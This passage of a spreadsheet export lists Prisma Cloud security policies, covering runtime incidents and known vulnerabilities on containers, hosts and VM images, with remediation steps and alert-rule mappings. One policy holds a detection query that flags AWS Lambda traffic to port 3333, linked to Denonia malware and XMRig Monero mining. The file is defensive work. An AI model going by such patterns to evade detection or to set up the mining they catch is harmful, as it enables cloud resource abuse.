      <c r="T3528" t="b">
        <v>0</v>
      </c>
      <c r="U3528" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3528" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3528" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda function which are communicating with ports known to mine Monero. AWS Lambda functions when infected with Denonia malware installs a XMRig mining software which is used for mining Monero. It is highly recommended to restrict Lambda function to known hosts or services only.</t>
        </is>
      </c>
      <c r="X3528" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict traffic from the Internet:
1. Visit the Network path Analysis from Source to Destination and review the network path components that allow internet access.
2. Identify the network component on which restrictive rules can be implemented.
3. Implement the required changes and make sure no other resources have been impacted due to these changes:
 a) The overly permissive Security Group rules can be made more restrictive.
 b) Move the Lambda function database instance inside a restrictive subnet.
 c) Define a NAT rule to restrict traffic coming from the Internet to the respective Lambda function database instance.</t>
        </is>
      </c>
      <c r="Y3528" t="inlineStr"/>
      <c r="Z3528" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where source.publicnetwork IN ( 'Internet IPs' , 'Suspicious IPs' , 'AWS IPs', 'Azure IPs', 'GCP IPs' ) and protocol IN ( 'TCP' ) and dest.port = 3333 and dest.resource IN ( resource where role IN ( 'AWS Lambda' ) ) and bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3528" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3528" t="inlineStr">
        <is>
          <t>2023-07-20 18:01:41</t>
        </is>
      </c>
      <c r="AC3528" t="inlineStr">
        <is>
          <t>PC-AWS-LMB-878</t>
        </is>
      </c>
      <c r="AD3528" t="b">
        <v>1</v>
      </c>
      <c r="AE3528" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3528" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3528" t="inlineStr">
        <is>
          <t>ALERT ALL test - Notifications:, AccountGroups:DM_TEST_account Demo;, Audit jmontufar - Notifications:email, AccountGroups:PCS GCP Accounts;, Azure AKS cluster Azure CNI networking not enabled - Notifications:, AccountGroups:Mark Davis Acct Group;, AzureDriftDetection - Notifications:email, AccountGroups:PCS Azure Accounts;,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Critical Misconfigs to ServiceNow - Notifications:service_now, AccountGroups:Marc's Account Group;, DM_TEST_GCP_test - Notifications:email, AccountGroups:DM_TEST_account Demo;, Default Alert Rule - Notifications:service_now, AccountGroups:Default Account Group,dmensah-shi-test;, Exposed Cloud Functions - Notifications:, AccountGroups:PCS SWAT - Autoremediation Group,PCS SWAT Account Group - DO NOT TOUCH,PCS Lab OCI Accounts,PCS GCP Accounts,PCS AWS Accounts;, GCP Merchant - Notifications:, AccountGroups:PCS GCP Accounts;, IAM Role not enabled - Notifications:, AccountGroups:AWS Cloud willixmorax;, IAM-MA Alert Rule - Notifications:amazon_sqs, AccountGroups:Default Account Group;,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KL_Test_Rule3 - Notifications:webhook, AccountGroups:K-Lo_AccountGroup;, MA-90 days rotation - Notifications:jira, AccountGroups:TestAGMA;,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DNS record alert route 53 - Notifications:, AccountGroups:TestMA;, PCS - Basic Alert Rule - Notifications:, AccountGroups:PCS Azure Accounts,PCS GCP Accounts,PCS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Ports open to the internet - Notifications:, AccountGroups:AWS Cloud willixmorax;, Random v2 - Notifications:email, AccountGroups:shyama-aws;,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Ranti-rule-xsoar - Notifications:demisto, AccountGroups:Default Account Group,Ranti-Azure-terraform-group,Ranti-GCP-Grp,Ranti-Account-Group;, RantiAlertRule-3 - Notifications:amazon_sqs,aws_security_hub,jira,webhook, AccountGroups:PCS AWS Lab Org,Ranti-GCP-Grp,Ranti-Account-Group,PCS GCP Accounts,PCS AWS Accounts;, RaviAlert rule - Notifications:, AccountGroups:PCS AWS Lab Org;, Stella test - Notifications:, AccountGroups:Stella_All,Vaibhav_TEST;, TEST - Notifications:, AccountGroups:Vaibhav_TEST;, TEST/XN - Notifications:, AccountGroups:test1_account_group_20231006;, Test23 - Notifications:, AccountGroups:afortes;, alert-rule-tushir - Notifications:, AccountGroups:Default Account Group,Compute Only,PCS AWS Lab Org,PCS Azure Accounts,Mark Davis Acct Group,tushir-account-group,Bpachauli Account group,PCSLABAG-MA,cfarquhar,tadenugba AG,PCS GCP Accounts,tp,Pramm_test,Wikenson account group,Chubb Account Group Test,jjc-demo-gp,tushir-java,DM_TEST_NEW,DM_TEST_2_Account_Group,kfirdaus-account-group,kfirdaus-GCP-acct-group,kfirdaus-Azure-Acct,kfirdaus AWS Account,cloudwatch_ag,ACCOUNT_GROUP_NAME,CM test group,DM_TEST_account Demo,Gklimeck Account Group,llatorre - Account Group,dalomari-test,Shyama-test1,PCS AWS Accounts;,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attack path - Notifications:, AccountGroups:Default Account Group,Compute Only,PCS AWS Lab Org,PCS Azure Accounts,Mark Davis Acct Group,Xpanse-PrismaCloud-AccountGroup,tushir-account-group,TestAGMA,Kiran,Stella_Azure,Stella_All,Stella_AWS,Vaibhav_TEST,dluzardo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aws-ec2-public-ip - Notifications:, AccountGroups:Shyama-test1;, azure-sentinel-test-pk - Notifications:amazon_sqs, AccountGroups:Default Account Group,Compute Only,jbrox_priv_acc,PCS AWS Lab Org,PCS Azure Accounts,Mark Davis Acct Group,Xpanse-prisma-test-utk,Xpanse-PrismaCloud-AccountGroup,hcl-runtime-alert-test,manish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benedict-alert-rule-BP - Notifications:service_now, AccountGroups:jmontufar-group1,jmontufar-group,Xpanse-prisma-test-utk,compute-zw-rbac,PCS Lab OCI Accounts,Vaibhav_TEST,NASDAQ PM,test-edge,PCS GCP Accounts,Wikenson account group;, bgoldstein-webhook-test-rule - Notifications:, AccountGroups:PCS SWAT Account Group - DO NOT TOUCH;, cj_test_tagBased - Notifications:, AccountGroups:Default Account Group;, cku-Alert-Rule-01 - Notifications:email, AccountGroups:PCS AWS Accounts;, cku-Alert-Rule-02 - Notifications:email, AccountGroups:PCS Azure Accounts;, dluzardo - alert rule - Notifications:email, AccountGroups:dluzardo AGlabs;, jbrox-AlertRule-MSTeams-Email - Notifications:email,microsoft_teams, AccountGroups:jbrox_priv_acc;, jbrox-all-accounts-noDDoS-policy - Notifications:, AccountGroups:jbrox_priv_acc;, jvp-alerts - Notifications:, AccountGroups:Default Account Group;, kfirdaus-alert-rule - Notifications:, AccountGroups:kfirdaus-account-group,kfirdaus-GCP-acct-group;, llatorre - Alert Rule -  AzurePCSLab Subscription - Notifications:, AccountGroups:K-Lo_AccountGroup;, llatorre - Alert Rule -  K-Lo_TestAccount_Azure Subscription - Notifications:, AccountGroups:PCS AWS Lab Org,PCS Azure Accounts;, llatorre - Alert Rule - Notifications:, AccountGroups:Default Account Group,Compute Only,PCS AWS Lab Org,PCS Azure Accounts,Mark Davis Acct Group,tushir-account-group,Bpachauli Account group,PCS GCP Accounts,tushir-java,DM_TEST_NEW,DM_TEST_2_Account_Group,kfirdaus-account-group,kfirdaus-GCP-acct-group,kfirdaus-Azure-Acct,kfirdaus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manish alert exception report - Notifications:, AccountGroups:Account Group - Cloud Discovery - Zw,tussirpruthii,RGM-Test,tadenugba_AG1,tadenugba_ACCOUNT_GROUP_NAME,CostSavings-Team,vstoyko-test,test_acc_grp1,demo0126,slivingston_test,PCS AWS Lab Org,test ac grp,test3,test pablo,tushir-db-google,test1_account_group_20231006,SUGATHRI TUMIKI,PC-GCP-Onboarding-demo,compute-zw-rbac,mytestgroup,tushir-account-group,Stella_Azure,Stella_All,Stella_AWS,Vaibhav_TEST,shyama-aws,tushir-db,AWS-agentless-demo,tushir-google,tadenugba AG,tp,Wikenson account group,Chubb Account Group Test,tushir-java,cloudwatch_ag,Shyama-test1;, manish test 1 - Notifications:, AccountGroups:PCS AWS Lab Org;, manish test 2 - Notifications:, AccountGroups:PCS AWS Lab Org;, manish test event exclude rule - Notifications:, AccountGroups:PCS AWS Lab Org;,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mbv-azure-appgw - Notifications:, AccountGroups:mbv-azure-appgw;, mypersonal_compliance - Notifications:, AccountGroups:mytestgroup;, mytest-2-alert - Notifications:email, AccountGroups:PCS AWS Accounts;, pagerduty-test - Notifications:, AccountGroups:Default Account Group,PCS AWS Lab Org,PCS Azure Accounts,PCS SWAT - Autoremediation Group,PCS SWAT Account Group - DO NOT TOUCH,PCS Lab OCI Accounts,PCS GCP Accounts,PCS AWS Accounts;, ranti-remediation test - Notifications:aws_s3, AccountGroups:Ranti-Azure-terraform-group,Ranti-Account-Group;, splunk-test - Notifications:splunk, AccountGroups:afortes;, tadenugba_Test_Rule - Notifications:, AccountGroups:tadenugba AG;, tadenugba_Test_Rule1 - Notifications:, AccountGroups:tadenugba AG;, tag owner madavis1 - Notifications:, AccountGroups:mdavis1 AWS stand alone;, test SI - XN - Notifications:, AccountGroups:Default Account Group;, test-ebs - Notifications:slack, AccountGroups:mytestgroup;, test-ebs-1 - Notifications:, AccountGroups:mytestgroup;, test-mms-may-15 - Notifications:, AccountGroups:mytestgroup;, test-yor-tushir - Notifications:, AccountGroups:PCS AWS Lab Org,PCS AWS Accounts;, test1_alert_rules_20231006 - Notifications:, AccountGroups:vstoyko-test,test1_account_group_20231006;, testrule - Notifications:, AccountGroups:test;, testrule1 - Notifications:, AccountGroups:test;, tushir-dell - Notifications:, AccountGroups:tushir-db;</t>
        </is>
      </c>
      <c r="AH3528" t="inlineStr">
        <is>
          <t>f7a08c0c-4ffb-46da-a78e-6a02dc2dacac</t>
        </is>
      </c>
      <c r="AI3528" t="inlineStr">
        <is>
          <t>bd91f9fc-3907-4d78-9e7e-2bf176b11323</t>
        </is>
      </c>
      <c r="AJ3528" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3528" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3529">
      <c r="A3529" t="inlineStr"/>
      <c r="B3529" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3529" s="2" t="inlineStr"/>
      <c r="D3529" t="n">
        <v>64</v>
      </c>
      <c r="E3529" t="n">
        <v>70</v>
      </c>
      <c r="F3529" t="n">
        <v>0</v>
      </c>
      <c r="G3529" t="b">
        <v>1</v>
      </c>
      <c r="H3529" t="inlineStr">
        <is>
          <t>All Compute, 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test-cm, test-dws, workload-policies-demo</t>
        </is>
      </c>
      <c r="I3529" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3529" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="K3529" t="inlineStr">
        <is>
          <t>Container workloads detected with Runtime Incidents</t>
        </is>
      </c>
      <c r="L3529" t="inlineStr"/>
      <c r="M3529" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3529" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3529" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="P3529" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3529" t="inlineStr"/>
      <c r="R3529" t="inlineStr"/>
      <c r="S3529" t="inlineStr"/>
      <c r="T3529" t="b">
        <v>0</v>
      </c>
      <c r="U3529" t="inlineStr">
        <is>
          <t>runtime_incident</t>
        </is>
      </c>
      <c r="V3529" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="W3529" t="inlineStr">
        <is>
          <t>This policy identifies Container workloads detected with Runtime Incidents. A Runtime Incident occurs when an anomalous event is detected in the resource which could possibly lead to a potential attack. It is highly recommended to examine and mitigate the runtime incident reported for the Container workload.</t>
        </is>
      </c>
      <c r="X3529" t="inlineStr">
        <is>
          <t>The following steps are recommended to remediate runtime incidents:
1) Apply the recommended mitigations for the particular runtime incident.
2) Consider blocking both inbound and outbound network traffic
3) Review the incident and check for any sensitive operations carried out
4) Review the permissions and revoke them if required
5) Install patches for known vulnerabilities on the Container workload</t>
        </is>
      </c>
      <c r="Y3529" t="inlineStr"/>
      <c r="Z3529" t="inlineStr"/>
      <c r="AA3529" t="inlineStr">
        <is>
          <t>Yash Boravelli</t>
        </is>
      </c>
      <c r="AB3529" t="inlineStr">
        <is>
          <t>2024-01-08 18:10:40</t>
        </is>
      </c>
      <c r="AC3529" t="inlineStr"/>
      <c r="AD3529" t="b">
        <v>1</v>
      </c>
      <c r="AE3529" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3529" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3529" t="inlineStr">
        <is>
          <t>All Compute - Notifications:splunk, AccountGroups:;,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test-cm - Notifications:, AccountGroups:;, test-dws - Notifications:, AccountGroups:;, workload-policies-demo - Notifications:, AccountGroups:;</t>
        </is>
      </c>
      <c r="AH3529" t="inlineStr">
        <is>
          <t>2f6a1ddf-d2f2-40c8-8598-c52f3438d0dc</t>
        </is>
      </c>
      <c r="AI3529" t="inlineStr"/>
      <c r="AJ3529" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3529" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3530">
      <c r="A3530" t="inlineStr"/>
      <c r="B3530" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3530" s="2" t="inlineStr"/>
      <c r="D3530" t="n">
        <v>24</v>
      </c>
      <c r="E3530" t="n">
        <v>9</v>
      </c>
      <c r="F3530" t="n">
        <v>49</v>
      </c>
      <c r="G3530" t="b">
        <v>1</v>
      </c>
      <c r="H3530"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tadenugba fake alert, test-dws</t>
        </is>
      </c>
      <c r="I3530" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3530" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="K3530" t="inlineStr">
        <is>
          <t>Host workloads detected with Runtime Incidents</t>
        </is>
      </c>
      <c r="L3530" t="inlineStr"/>
      <c r="M3530" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3530" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3530" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="P3530" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3530" t="inlineStr"/>
      <c r="R3530" t="inlineStr"/>
      <c r="S3530" t="inlineStr"/>
      <c r="T3530" t="b">
        <v>0</v>
      </c>
      <c r="U3530" t="inlineStr">
        <is>
          <t>runtime_incident</t>
        </is>
      </c>
      <c r="V3530" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="W3530" t="inlineStr">
        <is>
          <t>This policy identifies Host workloads detected with Runtime Incidents. A Runtime Incident occurs when an anomalous event is detected in the resource which could possibly lead to a potential attack. It is highly recommended to examine and mitigate the runtime incident reported for the Host workload.</t>
        </is>
      </c>
      <c r="X3530" t="inlineStr">
        <is>
          <t>The following steps are recommended to remediate runtime incidents:
1) Apply the recommended mitigations for the particular runtime incident.
2) Consider blocking both inbound and outbound network traffic
3) Review the incident and check for any sensitive operations carried out
4) Review the permissions and revoke them if required
5) Install patches for known vulnerabilities on the Host workload</t>
        </is>
      </c>
      <c r="Y3530" t="inlineStr"/>
      <c r="Z3530" t="inlineStr"/>
      <c r="AA3530" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3530" t="inlineStr">
        <is>
          <t>2022-04-14 04:33:41</t>
        </is>
      </c>
      <c r="AC3530" t="inlineStr"/>
      <c r="AD3530" t="b">
        <v>1</v>
      </c>
      <c r="AE3530" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3530" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3530"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tadenugba fake alert - Notifications:, AccountGroups:;, test-dws - Notifications:, AccountGroups:;</t>
        </is>
      </c>
      <c r="AH3530" t="inlineStr">
        <is>
          <t>30cfde92-4a3f-4f1d-966b-08c42b8b0f26</t>
        </is>
      </c>
      <c r="AI3530" t="inlineStr"/>
      <c r="AJ3530" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3530" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3531">
      <c r="A3531" t="inlineStr"/>
      <c r="B3531" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3531" s="2" t="inlineStr"/>
      <c r="D3531" t="inlineStr"/>
      <c r="E3531" t="inlineStr"/>
      <c r="F3531" t="inlineStr"/>
      <c r="G3531" t="b">
        <v>1</v>
      </c>
      <c r="H3531"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test-dws</t>
        </is>
      </c>
      <c r="I3531" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3531" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="K3531" t="inlineStr">
        <is>
          <t>Apps Embedded detected with Runtime Incidents</t>
        </is>
      </c>
      <c r="L3531" t="inlineStr"/>
      <c r="M3531" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3531" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3531" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="P3531" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3531" t="inlineStr"/>
      <c r="R3531" t="inlineStr"/>
      <c r="S3531" t="inlineStr"/>
      <c r="T3531" t="b">
        <v>0</v>
      </c>
      <c r="U3531" t="inlineStr">
        <is>
          <t>runtime_incident</t>
        </is>
      </c>
      <c r="V3531" t="inlineStr">
        <is>
          <t>workload_incident</t>
        </is>
      </c>
      <c r="W3531" t="inlineStr">
        <is>
          <t>This policy identifies Apps Embedded detected with Runtime Incidents. A Runtime Incident occurs when an anomalous event is detected in the resource which could possibly lead to a potential attack. It is highly recommended to examine and mitigate the runtime incident reported for the App Embedded workload.</t>
        </is>
      </c>
      <c r="X3531" t="inlineStr">
        <is>
          <t>The following steps are recommended to remediate runtime incidents:
1) Apply the recommended mitigations for the particular runtime incident.
2) Consider blocking both inbound and outbound network traffic
3) Review the incident and check for any sensitive operations carried out
4) Review the permissions and revoke them if required
5) Install patches for known vulnerabilities on the Host workload</t>
        </is>
      </c>
      <c r="Y3531" t="inlineStr"/>
      <c r="Z3531" t="inlineStr"/>
      <c r="AA3531" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3531" t="inlineStr">
        <is>
          <t>2023-04-28 07:45:22</t>
        </is>
      </c>
      <c r="AC3531" t="inlineStr"/>
      <c r="AD3531" t="b">
        <v>1</v>
      </c>
      <c r="AE3531" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3531" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3531"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test-dws - Notifications:, AccountGroups:;</t>
        </is>
      </c>
      <c r="AH3531" t="inlineStr">
        <is>
          <t>45905e17-b6f4-485a-9bbe-6610a417a8e6</t>
        </is>
      </c>
      <c r="AI3531" t="inlineStr"/>
      <c r="AJ3531" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3531" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3532">
      <c r="A3532" t="inlineStr"/>
      <c r="B3532" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3532" s="2" t="inlineStr"/>
      <c r="D3532" t="n">
        <v>10</v>
      </c>
      <c r="E3532" t="n">
        <v>10</v>
      </c>
      <c r="F3532" t="n">
        <v>0</v>
      </c>
      <c r="G3532" t="b">
        <v>1</v>
      </c>
      <c r="H3532"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tadenugba fake alert, test-dws, testsrnimmagadda</t>
        </is>
      </c>
      <c r="I3532" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3532" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="K3532" t="inlineStr">
        <is>
          <t>Host VM Images detected with known Vulnerabilities</t>
        </is>
      </c>
      <c r="L3532" t="inlineStr"/>
      <c r="M3532" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3532" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3532" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="P3532" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3532" t="inlineStr"/>
      <c r="R3532" t="inlineStr"/>
      <c r="S3532" t="inlineStr"/>
      <c r="T3532" t="b">
        <v>0</v>
      </c>
      <c r="U3532" t="inlineStr">
        <is>
          <t>vulnerabilities</t>
        </is>
      </c>
      <c r="V3532" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="W3532" t="inlineStr">
        <is>
          <t>This policy identifies Hosts VM images detected with known vulnerabilities. Vulnerabilities could be exploited by attackers to compromise the confidentiality, integrity, or availability of the affected Host VM image to perform malicious actions. It is highly recommended to remediate the vulnerabilities reported for the Host VM image.</t>
        </is>
      </c>
      <c r="X3532" t="inlineStr">
        <is>
          <t>The following steps are recommended to remediate the vulnerability:
1) Understand the vulnerability and the significant risk it can pose
2) Apply the recommended patches, workarounds, or mitigations to remediate the vulnerability
3) Ascertain if any damage caused by the vulnerability</t>
        </is>
      </c>
      <c r="Y3532" t="inlineStr"/>
      <c r="Z3532" t="inlineStr"/>
      <c r="AA3532" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3532" t="inlineStr">
        <is>
          <t>2023-04-28 07:45:22</t>
        </is>
      </c>
      <c r="AC3532" t="inlineStr"/>
      <c r="AD3532" t="b">
        <v>1</v>
      </c>
      <c r="AE3532" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3532" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3532"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tadenugba fake alert - Notifications:, AccountGroups:;, test-dws - Notifications:, AccountGroups:;, testsrnimmagadda - Notifications:aws_s3, AccountGroups:;</t>
        </is>
      </c>
      <c r="AH3532" t="inlineStr">
        <is>
          <t>34c1e0fd-f516-4b46-8d59-f69b6f28a504</t>
        </is>
      </c>
      <c r="AI3532" t="inlineStr"/>
      <c r="AJ3532" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3532" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3533">
      <c r="A3533" t="inlineStr"/>
      <c r="B3533" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3533" s="2" t="inlineStr"/>
      <c r="D3533" t="n">
        <v>724</v>
      </c>
      <c r="E3533" t="n">
        <v>179</v>
      </c>
      <c r="F3533" t="n">
        <v>1256</v>
      </c>
      <c r="G3533" t="b">
        <v>1</v>
      </c>
      <c r="H3533" t="inlineStr">
        <is>
          <t>All Compute, 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test-dws, testsrnimmagadda, workload-policies-demo</t>
        </is>
      </c>
      <c r="I3533" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3533" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="K3533" t="inlineStr">
        <is>
          <t>Container Images detected with known Vulnerabilities</t>
        </is>
      </c>
      <c r="L3533" t="inlineStr"/>
      <c r="M3533" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3533" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3533" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="P3533" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3533" t="inlineStr"/>
      <c r="R3533" t="inlineStr"/>
      <c r="S3533" t="inlineStr">
        <is>
          <t>workload</t>
        </is>
      </c>
      <c r="T3533" t="b">
        <v>0</v>
      </c>
      <c r="U3533" t="inlineStr">
        <is>
          <t>vulnerabilities</t>
        </is>
      </c>
      <c r="V3533" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="W3533" t="inlineStr">
        <is>
          <t>This policy identifies Container Images detected with known vulnerabilities. Vulnerabilities could be exploited by attackers to compromise the confidentiality, integrity, or availability of the affected Container to perform malicious actions. It is highly recommended to remediate the vulnerabilities reported for the Container Image.</t>
        </is>
      </c>
      <c r="X3533" t="inlineStr">
        <is>
          <t>The following steps are recommended to remediate the vulnerability:
1) Understand the vulnerability and the significant risk it can pose
2) Apply the recommended patches, workarounds, or mitigations to remediate the vulnerability
3) Ascertain if any damage caused by the vulnerability</t>
        </is>
      </c>
      <c r="Y3533" t="inlineStr"/>
      <c r="Z3533" t="inlineStr"/>
      <c r="AA3533" t="inlineStr">
        <is>
          <t>Pratik Saurabh</t>
        </is>
      </c>
      <c r="AB3533" t="inlineStr">
        <is>
          <t>2024-08-09 12:02:54</t>
        </is>
      </c>
      <c r="AC3533" t="inlineStr"/>
      <c r="AD3533" t="b">
        <v>1</v>
      </c>
      <c r="AE3533" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3533" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3533" t="inlineStr">
        <is>
          <t>All Compute - Notifications:splunk, AccountGroups:;, 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test-dws - Notifications:, AccountGroups:;, testsrnimmagadda - Notifications:aws_s3, AccountGroups:;, workload-policies-demo - Notifications:, AccountGroups:;</t>
        </is>
      </c>
      <c r="AH3533" t="inlineStr">
        <is>
          <t>0452698b-cd31-4f99-8ed4-9337b1ec6451</t>
        </is>
      </c>
      <c r="AI3533" t="inlineStr"/>
      <c r="AJ3533" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3533" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3534">
      <c r="A3534" t="inlineStr"/>
      <c r="B3534" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3534" s="2" t="inlineStr"/>
      <c r="D3534" t="n">
        <v>932</v>
      </c>
      <c r="E3534" t="n">
        <v>146</v>
      </c>
      <c r="F3534" t="n">
        <v>875</v>
      </c>
      <c r="G3534" t="b">
        <v>1</v>
      </c>
      <c r="H3534" t="inlineStr">
        <is>
          <t>BG-AH-Email-Test, BPtestTag, Compute test Jmontufar,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test-dws, testsrnimmagadda</t>
        </is>
      </c>
      <c r="I3534" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3534" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="K3534" t="inlineStr">
        <is>
          <t>Hosts detected with known Vulnerabilities</t>
        </is>
      </c>
      <c r="L3534" t="inlineStr"/>
      <c r="M3534" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3534" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3534" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="P3534" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3534" t="inlineStr"/>
      <c r="R3534" t="inlineStr"/>
      <c r="S3534" t="inlineStr"/>
      <c r="T3534" t="b">
        <v>0</v>
      </c>
      <c r="U3534" t="inlineStr">
        <is>
          <t>vulnerabilities</t>
        </is>
      </c>
      <c r="V3534" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="W3534" t="inlineStr">
        <is>
          <t>This policy identifies Hosts detected with known vulnerabilities. Vulnerabilities could be exploited by attackers to compromise the confidentiality, integrity, or availability of the affected Host to perform malicious actions. It is highly recommended to remediate the vulnerabilities reported for the Host.</t>
        </is>
      </c>
      <c r="X3534" t="inlineStr">
        <is>
          <t>The following steps are recommended to remediate the vulnerability:
1) Understand the vulnerability and the significant risk it can pose
2) Apply the recommended patches, workarounds, or mitigations to remediate the vulnerability
3) Ascertain if any damage caused by the vulnerability</t>
        </is>
      </c>
      <c r="Y3534" t="inlineStr"/>
      <c r="Z3534" t="inlineStr"/>
      <c r="AA3534" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3534" t="inlineStr">
        <is>
          <t>2022-04-14 04:33:41</t>
        </is>
      </c>
      <c r="AC3534" t="inlineStr"/>
      <c r="AD3534" t="b">
        <v>1</v>
      </c>
      <c r="AE3534" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3534" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3534"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Compute test Jmontufar - Notifications:jira, AccountGroups:;,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test-dws - Notifications:, AccountGroups:;, testsrnimmagadda - Notifications:aws_s3, AccountGroups:;</t>
        </is>
      </c>
      <c r="AH3534" t="inlineStr">
        <is>
          <t>1a3c9450-ffa3-427b-8bc4-d6a8bfdb0f36</t>
        </is>
      </c>
      <c r="AI3534" t="inlineStr"/>
      <c r="AJ3534" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3534" t="inlineStr">
        <is>
